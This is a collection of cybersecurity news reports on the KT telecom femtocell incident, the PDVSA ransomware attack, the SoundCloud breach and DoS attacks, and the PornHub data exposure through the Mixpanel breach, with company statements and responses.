Security experts in South Korea have weighed in on the report’s findings. Dmitry Kurbatov, Chief Technology Officer at global communication security company SecurityGen, posted on LinkedIn that “the unauthorized micro-payment incident at KT is likely a deeper issue involving a network of thousands of femtocells.” Similarly, Kim Yong-dae, a professor in the Department of Electrical and Electronic Engineering at KAIST, described the incident as essentially a wiretapping operation rather than conventional financial fraud.  While Rethink Technology Research frames the attack as unprecedented in scope and sophistication, KT officials have pushed back against the report’s conclusions. A company spokesperson stated, “If you look at other reports by the author of this report, there is a tendency to be favorable and biased toward certain companies. It is difficult to regard this as an objective interpretation.” 

The KT Cyberattack Investigation Timeline

The cyberattack on KT was first detected in early September, when irregular micro-payments were identified across the network. A joint government-private investigation has been ongoing for over three months, with authorities yet to release the final findings. Analysts attribute the delay to stretched investigative resources due to a series of large-scale cyber incidents in South Korea, including the Coupang data leak. Some have also speculated that the prolonged timeline may indicate an intentional delay on KT’s part.  For comparison, the SK Telecom hacking case was resolved within two and a half months, followed by compensation announcements for affected users. In the case of KT, an investigation team official noted during a briefing following the presidential business report on December 12, “While investigating KT, additional issues have emerged, and server forensics are taking a considerable amount of time.”  Industry observers warn that the cyberattack on KT should serve as a cautionary tale for telecom operators not only in South Korea but globally. 

Venezuela’s state-run oil company, Petróleos de Venezuela (PDVSA), has confirmed that a cyberattack on PDVSA’s administrative systems caused widespread disruptions, even as the company publicly claimed that oil operations were unaffected. The Venezuela oil cyberattack  or PDVSA cyberattack comes at a time of escalating political and military tensions between Caracas and Washington, following recent U.S. actions against Venezuelan oil shipments. PDVSA announced the incident in a statement on Monday, blaming the attack on the United States and describing it as part of a broader strategy to seize control of Venezuela’s oil resources. However, cybersecurity experts and company sources cited by Reuters have found no evidence linking the PDVSA cyberattack to the U.S. government.

PDVSA Blames US for Cyberattack on Venezuela’s Oil Company

In its statement, PDVSA accused the United States of coordinating the PDVSA cyberattack as part of what it called an aggressive campaign against Venezuela’s energy sovereignty. “This attempt at aggression adds to the public strategy of the U.S. government to take over Venezuelan oil by force and piracy,” PDVSA said. The company claimed the cyberattack was carried out by foreign interests working with domestic actors to undermine Venezuela’s right to develop its energy sector independently. Venezuela’s oil ministry echoed these accusations, stating that the attack aligned with U.S. efforts to control the country’s oil through “force and piracy.” Despite these claims, PDVSA provided no technical details about the attack or evidence supporting the allegations.

Ransomware Attack Suspected as PDVSA Systems Go Down

While PDVSA said it had recovered from the cyberattack, multiple sources told Reuters that the PDVSA ransomware attack was far more damaging than officials admitted. According to four sources, the company’s administrative systems remained down, forcing a halt to oil cargo deliveries. “There’s no delivery of cargoes, all systems are down,” one PDVSA source told Reuters, adding that workers internally described the incident as a ransomware attack. Sources said PDVSA detected the attack days earlier. In attempting to resolve the issue, antivirus software reportedly disrupted the company’s entire administrative network. As a result, workers were forced to keep handwritten records after systems failed to restart. Although oil production, refining, and domestic fuel distribution were reportedly unaffected due to PDVSA cyberattack, export logistics were severely disrupted. A shipper involved in Venezuelan oil deals confirmed that all loading instructions for export markets remained suspended.

Oil Exports Impacted as PDVSA Limits System Access

As the Venezuela cyberattack on PDVSA continued, the company reportedly ordered administrative and operational staff to disconnect from internal systems. Access for indirect workers was also restricted, according to sources. PDVSA’s website remained offline as of Tuesday afternoon, adding to concerns about the scale of the disruption. Despite official claims of recovery, sources said the effects of the cyber incident were ongoing.

PDVSA Cyberattack Follows US Seizure of Venezuelan Oil Tanker

The PDVSA cyberattack occurred just one week after U.S. military forces seized a PDVSA tanker carrying nearly 1.85 million barrels of Venezuelan heavy crude in the Caribbean. The seizure drew strong condemnation from Cuba, which described it as an act of piracy and a violation of international law. Cuban officials said the tanker was believed to be transporting oil destined for Cuba, a country that relies heavily on Venezuelan oil supplies. Following the seizure, Reuters reported that Venezuelan oil exports fell sharply, with some tankers turning back due to fears of further U.S. action. U.S. officials have indicated that more tanker seizures could follow in the coming weeks.

Geopolitical Pressure Intensifies Around Venezuela’s Oil Industry

The PDVSA cyberattack has unfolded amid a broader U.S. military buildup in the Caribbean, U.S. strikes on alleged drug trafficking boats, and renewed sanctions targeting Venezuelan shipping and individuals linked to President Nicolás Maduro. The Venezuelan government maintains that the United States is seeking regime change to gain access to the country’s vast oil reserves. PDVSA, which plays a key role in Venezuela’s financial ties with China, Russia, Iran, and Cuba, remains central to that struggle. As tensions rise, the PDVSA cyberattack highlights how digital attacks, sanctions, and military pressure are increasingly converging around Venezuela’s oil sector, with significant implications for global energy markets and regional stability.

SoundCloud has confirmed a cyberattack on its platform after days of user complaints about service disruptions and connectivity problems. In what is being reported as a SoundCloud cyberattack, threat actors gained unauthorized access to one of its systems and exfiltrated a limited set of user data. “SoundCloud recently detected unauthorized activity in an ancillary service dashboard,” the company said. “Upon making this discovery, we immediately activated our incident response protocols and promptly contained the activity.”  Reports of trouble began circulating over several days, with users reporting that they were unable to connect to SoundCloud or experiencing access issues when using VPNs. After the disruptions persisted, the company issued a public statement on its website acknowledging the SoundCloud cyberattack incident. 

DoS Follows Initial SoundCloud Cyberattack

According to the music hosting service provider, the SoundCloud cyberattack was followed by a wave of denial-of-service attacks that further disrupted access to the platform. The company said it experienced multiple DoS incidents after the breach was contained, two of which were severe enough to take the website offline and prevent users from accessing the service altogether.  SoundCloud stated that it was ultimately able to repel the attacks, but the interruptions were enough to draw widespread attention from users and the broader technology community. These events highlighted the cascading impact of a cyberattack on SoundCloud, where an initial security compromise was compounded by availability-focused attacks designed to overwhelm the platform. 

Scope of Exposed Data and User Impact 

While the SoundCloud cyberattack raised immediate concerns about user privacy, the company stresses that the exposed data was limited. SoundCloud said its investigation found no evidence that sensitive information had been accessed.  “We understand that a purported threat actor group accessed certain limited data that we hold,” the company said. “We have completed an investigation into the data that was impacted, and no sensitive data (such as financial or password data) has been accessed.”  Instead, the data involved consisted of email addresses and information already visible on public SoundCloud profiles. According to the company, approximately 20 percent of SoundCloud users were affected by the breach.   Although SoundCloud described the data as non-sensitive, the scale of the exposure is notable. Email addresses can still be leveraged in phishing campaigns or social engineering attacks, even when other personal details remain secure.  SoundCloud added that it is confident the attackers’ access has been fully shut down. “We are confident that any access to SoundCloud data has been curtailed,” the company said. 

Security Response and Ongoing Connectivity Issues 

The company did not attribute the SoundCloud cyberattack to a specific hacking group but confirmed that it is working with third-party cybersecurity experts and has fully engaged its incident response protocols. As part of its remediation efforts, the company said it has enhanced monitoring and threat detection, reviewed and reinforced identity and access controls, and conducted a comprehensive audit of related systems.  Some of these security upgrades had unintended consequences. SoundCloud acknowledged that changes made to strengthen its defenses contributed to the VPN connectivity issues reported by users in recent days.  “We are actively working to resolve these VPN related access issues,” the company said. 

PornHub is facing renewed scrutiny after confirming that some Premium users’ activity data was exposed following a security incident at a third-party analytics provider. The PornHub data breach disclosure comes as the platform faces increasing regulatory scrutiny in the United States and reported extortion attempts linked to the stolen data. The issue stems from a data breach linked not to PornHub’s own systems, but to Mixpanel, an analytics vendor the platform previously used. On December 12, 2025, PornHub published a security notice confirming that a cyberattack on Mixpanel led to the exposure of historical analytics data, affecting a limited number of Premium users. According to PornHub, the compromised data included search and viewing history tied to Premium accounts, which has since been used in extortion attempts attributed to the ShinyHunters extortion group. “A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users,” the company stated in its notice dated December 12, 2025.  PornHub stresses that the incident did not involve a compromise of its own systems and that sensitive account information remained protected.  “Specifically, this situation affects only select Premium users. It is important to note that this was not a breach of Pornhub Premium’s systems. Passwords, payment details, and financial information remain secure and were not exposed.”  According to PornHub, the affected records are not recent. The company said it stopped working with Mixpanel in 2021, indicating that any stolen data would be at least four years old. Even so, the exposure of viewing and search behavior has raised privacy concerns, particularly given the stigma and personal risk that can accompany such information if misused. 

Mixpanel Smishing Attack Triggered Supply-Chain Exposure 

The root of the incident was a PornHub cyberattack by proxy, a supply-chain compromise. Mixpanel disclosed on November 27, 2025, that it had suffered a breach earlier in the month. The company detected the intrusion on November 8, 2025, after a smishing (SMS phishing) campaign allowed threat actors to gain unauthorized access to its systems. Mixpanel CEO Jen Taylor addressed the incident in a public blog post, stressing transparency and remediation.  “On November 8th, 2025, Mixpanel detected a smishing campaign and promptly executed our incident response processes,” Taylor wrote. “We took comprehensive steps to contain and eradicate unauthorized access and secure impacted user accounts. We engaged external cybersecurity partners to remediate and respond to the incident.”  Mixpanel said the breach affected only a “limited number” of customers and that impacted clients were contacted directly. The company outlined an extensive response that included revoking active sessions, rotating compromised credentials, blocking malicious IP addresses, performing global password resets for employees, and engaging third-party forensic experts. Law enforcement and external cybersecurity advisors were also brought in as part of the response. 

OpenAI and PornHub Among Impacted Customers 

PornHub was not alone among Mixpanel’s customers caught up in the incident. OpenAI disclosed on November 26, 2025, one day before Mixpanel’s public announcement, that it, too, had been affected. OpenAI clarified that the incident occurred entirely within Mixpanel’s environment and involved limited analytics data related to some API users.  “This was not a breach of OpenAI’s systems,” the company said, adding that no chats, API requests, credentials, payment details, or government IDs were exposed. OpenAI noted that it uses Mixpanel to manage web analytics on its API front end.  PornHub denoted a similar assurance in its own disclosure, stating that it had launched an internal investigation with the support of cybersecurity experts and had engaged with relevant authorities. “We are working diligently to determine the nature and scope of the reported incident,” the company said, while urging users to remain vigilant for suspicious emails or unusual activity.  Despite those assurances, the cyberattack on PornHub, albeit indirect, has drawn attention due to the sensitive nature of the exposed data and the reported extortion attempts now linked to it. 

PornHub Data Breach Comes Amid Expanding U.S. Age-Verification Laws 

The PornHub data breach arrives at a time when the platform is already under pressure from sweeping age-verification laws across the United States. PornHub is currently blocked in 22 states, including Alabama, Arizona, Arkansas, Florida, Georgia, Idaho, Indiana, Kansas, Kentucky, Mississippi, Montana, Nebraska, North Carolina, North Dakota, Oklahoma, South Carolina, South Dakota, Tennessee, Texas, Utah, Virginia, and Wyoming. These restrictions stem from state laws requiring users to submit government-issued identification or other forms of age authentication to access explicit content.  Louisiana was the first state to enact such a law, and others followed after the U.S. Supreme Court ruled in June that Texas’s age-verification statute was constitutional. Although PornHub is not blocked in Louisiana, the requirement for ID verification has had a significant impact. Aylo, PornHub’s parent company, said that the traffic in the state dropped by approximately 80 percent after the law took effect.  Aylo has repeatedly criticized the implementation of these laws. “These people did not stop looking for porn. They just migrated to darker corners of the internet that don’t ask users to verify age, that don’t follow the law, that don’t take user safety seriously,” the company said in a statement.  Aylo added that while it supports age verification in principle, the current approach creates new risks. Requiring large numbers of adult websites to collect highly sensitive personal information, the company argued, puts users in danger if those systems are compromised.